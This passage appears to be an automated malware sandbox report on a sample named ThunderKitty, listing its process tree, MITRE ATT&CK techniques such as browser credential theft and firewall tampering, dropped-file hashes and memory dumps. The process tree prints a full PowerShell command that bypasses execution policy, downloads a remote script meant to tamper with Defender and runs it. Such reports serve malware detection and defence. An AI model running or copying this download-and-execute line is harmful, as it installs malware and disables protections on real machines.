  - Views/modifies file attributes
  PID:3912
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sap1w22\5sap1w22.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E24.tmp" "c:\Users\Admin\AppData\Local\Temp\5sap1w22\CSC7485B5D9AC154FD9AC49F4F1344DA48D.TMP"
      4⤵
      PID:5076

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4c0 0x31c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

File and Directory Discovery

T1083

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4bc8adebc24d5dd1b031d01a5db89e75

SHA1
7dd3ce45522a144dd4a1b3d7c06c6e5a278ae45b

SHA256
a30e02bbc9c490e7cccf07a851cb723954ecf1753587f121ee2a13dd144a3214

SHA512
afabe55ec85d00ca34a23a87fbaa90336982c7a96aad6f931639758b43478452c8d0abbdb05f03452cca878401de274c6be6481a6aab2d0be7f43d9023c757b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
92df60eb11c4a550a03d9b702974df53

SHA1
a8f2dd3752c2d1de16dac2bb0e5e4b7cb804c441

SHA256
7a8fb78344e605ecb761a5a84d54c0c5e09c76fb8b478e4337df274c005ec73a

SHA512
8bcc5610a4e68527a47861ea4d85e8bc2614844066b4c9d8f655608d67a13fa9eefaee777ab18de0d055dd3d3f74ffd0a6c29d68a94baf7d01c6cbd9df9559dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
C:\Users\Admin\AppData\Local\Temp\5sap1w22\5sap1w22.dll

Filesize
4KB

MD5
1b3f5eb0d81daf98e3d8f7503d1eeceb

SHA1
cbfb01833976408e766b719318ea886eadc43f60

SHA256
bf5260080b04f4eae74ad453c71c7ea68a3d4d21e78dbf382ea0f4fe1672ed4c

SHA512
f40fec9e5fc8cd2bf264d876ddbc88f2d5b57dfef55f393c40037ee3906a0eefeba295d1ac792fa2f55895c634652781deb1ca52ee511b2ea18d73c03031d4fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES99B0.tmp

Filesize
1KB

MD5
8f791430caa369ca0a0621154aed9c36

SHA1
3be7739a4bec5458d2a6540e8dd0aabd3dacf33d

SHA256
ebe71869dd8bcab2e5f08d82bee951eb116853e3d65e041c7bcac057e5283e6d

SHA512
50cc6f4e415f7a2895e4dc34e7ab911cd85b420c98ac0824191afa5c5b28bce8ea1f0697dfc724a3e32d372d715e95b82651a4c1401b85658eb9763357f02868

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES99B1.tmp

Filesize
1KB

MD5
05b176e0ead993ad4ed840c9326b5e61

SHA1
5c6d2f9d2b30566bd7ec596e4631806d6c981481

SHA256
805bf891152853fd7fd3c6cbb3ee0a76aa7c499a4292f7d79c8cad0a6911ead3

SHA512
09f83a2630431f108a69a618ab3591dba1f1ab5116101ec5faa469424523ee9c9cada6711b3931b05e468ebcfeacda7dda6af6854db1ab72ecbf116deba24f14

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9E24.tmp

Filesize
1KB

MD5
997bb0a09af2d92200be23ca6e1b2c4a

SHA1
d9391b956fcdb0e93653a8fb451cbe16cd5fc4ba

SHA256
04e58a02455c5f3b2a905e7cf7c4f491db387e23810416244c0fc893eb34250c

SHA512
1cd014c3a7525c1c73dedcc02886b3920e9ca9a6a3649e1858b0fa814990c18a0ec2884805ec3cdf86959c82a8d7feacc629eeb5c624fbce537e6e48618a7b5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
74KB

MD5
91cc8a078877c1f17e4881c21fd66017

SHA1
d388a6349a2cbf81a89e4a1297d57623ab1b5d61

SHA256
17e562066e3c49362e026d4930ab137d4b723e155ee653a5733591ae46615076

SHA512
a455dbdf5953d231fdcd1709231fe04d4e49323bf68d80cdf950f0a943445b29b0bb9ebc34e74710c56b35011fada3e74538465e2dbd727e48fd1829f30d78bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
b7dbaee4db9d9e140c7cb49dc9709d06

SHA1
30cef6eba2cb554373120da4b800500300e750ab

SHA256
431f4f2fdff0bbd6a983dcb29c9ef2c4812ff4133a0de8c858507f032b7ad27d

SHA512
4a619cb976ac2b95679d2db324a7958c581f1a4922e910a40ff3b6c0343391bf318bc426456e6fc2dfb9f1eee2c80e9d2411385d8458a64080f1fe28f54a0d7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wf2xjpnx.dqv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ooxmqqjr\ooxmqqjr.dll

Filesize
4KB

MD5
7ba23732c5d74305d52512ce7273b58a

SHA1
348c984f9b1951adf74c2e811fd9576de7511012

SHA256
baa85849a8b46cfab1f71dfd7213fb9b79013a40cccaa20381f562ced47264e6

SHA512
48db207165f615936f1100605fb2e7ebf3423730f6f465eafb15d3db4a2ead11a070a1a34299896fbde2730cd7b0f8e7f9e40911bba8efcca7cd2ec50d70e108

Download Submit
C:\Users\Admin\AppData\Local\Temp\ypexlctq\ypexlctq.dll

Filesize
4KB

MD5
6946ab101fdc07000b66747beffcb9bd

SHA1
7cbe548e76aec62a65bb0eaa8220b03e69fbd7ce

SHA256
dbc263bf7b356ae660ac2bc89405780718ae86a33e77cef72422ebc061396c67

SHA512
2daa1e1eaae9ba34be66e969f78527b701d5b1005d226f52b26603ed5c0f81da1722923ba85f26a9e1823f1960a9116ca671717e5e4db9e773e33712164573f2

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5sap1w22\5sap1w22.cmdline

Filesize
369B

MD5
05f3a71916b6f36ad949d28605eac24c

SHA1
5e19427ef7d36bd65367c443fbf891808504b69d

SHA256
a880ff1e655df859afc7d03450d9a4feede649c565ccc35f03cd6d826f5e59ee

SHA512
3b5db85b5c07ecbcaf0cde8a5f331069d0388c3fbb181c281df0c0ef3d257d1534eec7b1a99db5d25573c6317a12da02b48785b3477ebb43cdb2e28794d6cc47

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5sap1w22\CSC7485B5D9AC154FD9AC49F4F1344DA48D.TMP

Filesize
652B

MD5
5ed53597311b36f4a9784bb0366afbed

SHA1
9abe2b1f8c8e4572ca94675ae24cf9f7cade9172

SHA256
05eb2b104de8b27c6114d135b8c369492acf33e8008ceb50c40e782d71742454

SHA512
58878e7550a8bdcf60dc2d5e2feb6e2c4209a02379d244d3e39b19d321da156de9a36b678034cf883dcf3592a18349b61f45411bbc5450dd4eb5ae7aa4445f13

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ooxmqqjr\CSC7F88ACB699DB433C9475E627384D7A86.TMP

Filesize
652B

MD5
e204a3f3ac4aa45c292ff4c4e2c1494c

SHA1
bfa60586eeddbd689334abefadf218196e30ca6c

SHA256
428404d10c03b7cc7f00f9b62a9af2bfe5a1c406eba3100b7e3352f26f271d1b

SHA512
1b2a4d954ffd7c1d4bd977817cc3ba83a709b5f21ccd83a79b8aef3290af8880af2a2570a8f9b88be240ad5b8556027f23af215212bed22d42722e156a9f7a0c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ooxmqqjr\ooxmqqjr.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ooxmqqjr\ooxmqqjr.cmdline

Filesize
369B

MD5
c2e02bf71a97ba2ff9676a80b05d1242

SHA1
ff0c322091005e8fc6a7951469c189381cd9d1c9

SHA256
dd13042487086180e6716dfc61ba9d2358b6a375fe8a89299145b380b8f332d6

SHA512
e00c345093fe6022017b19247989d1960bec2ed032f45f79ae4cd019f017d7d520ac847feac09702dd7b34d7aa21e38b568cc6d829d96a634ea36268a5836a31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ypexlctq\CSC1DC421912A03406AB1AE781EF8CB15.TMP

Filesize
652B

MD5
02fbd301561e79f35bd7942f0d1f2725

SHA1
80881f80ab3d1259b29139a2a152dbcc228b5de2

SHA256
31a901ba76885150a20274001f3a248c2574b5081103d40c8183081a97b3e6be

SHA512
eed697fbf72f9c8fc3bcb9c7781fa64c538303051f2b970dedab85e5b7040c7aab31bc40e848e713028c67f5b2748bd5b5dbb661d01fbc8958e50eac59b7b476

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ypexlctq\ypexlctq.cmdline

Filesize
369B

MD5
687308f115009dd608e0015001614968

SHA1
c5600242e3664dd144009c23375c81087861a9ad

SHA256
fd82dfcfc3499932defe76f9e8e98cb30fb744fd25c44b4d0ea59a991ab10058

SHA512
75ee5d88b24bb716691c5c3b3a553e7eec05de8ec05d5a1137e2ae8791b5284e1e157bcc3521abf581cae4a48df1a7956f2de7f8875c50237c57592754e08055

Download Submit
memory/4280-150-0x00000163CA7F0000-0x00000163CA802000-memory.dmp

Filesize
72KB

Download
memory/4280-80-0x00000163CAB60000-0x00000163CB306000-memory.dmp

Filesize
7.6MB

Download
memory/4280-119-0x00000163CA7F0000-0x00000163CA814000-memory.dmp

Filesize
144KB

Download
memory/4280-118-0x00000163CA7F0000-0x00000163CA81A000-memory.dmp

Filesize
168KB

Download
memory/4280-70-0x00000163C7D90000-0x00000163C7D98000-memory.dmp

Filesize
32KB

Download
memory/4280-151-0x00000163CA7E0000-0x00000163CA7EA000-memory.dmp

Filesize
40KB

Download
memory/4516-110-0x0000028D1BC90000-0x0000028D1BC98000-memory.dmp

Filesize
32KB

Download
memory/5048-0-0x00007FF871680000-0x00007FF871949000-memory.dmp

Filesize
2.8MB

Download
memory/5048-86-0x00007FF871680000-0x00007FF871949000-memory.dmp

Filesize
2.8MB

Download
memory/5048-68-0x0000012561320000-0x0000012561328000-memory.dmp

Filesize
32KB

Download
memory/5048-16-0x000001257B650000-0x000001257B672000-memory.dmp

Filesize
136KB

Download
memory/5048-1-0x00007FF871680000-0x00007FF871949000-memory.dmp

Filesize
2.8MB

Download